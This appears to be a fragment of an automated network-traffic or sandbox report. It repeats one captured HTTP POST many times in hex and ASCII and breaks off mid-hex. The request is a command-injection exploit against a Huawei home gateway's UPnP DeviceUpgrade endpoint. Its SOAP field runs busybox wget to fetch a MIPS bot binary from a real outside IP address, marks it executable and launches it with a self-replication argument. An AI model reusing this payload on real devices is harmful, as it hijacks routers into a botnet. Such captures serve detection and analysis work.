2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 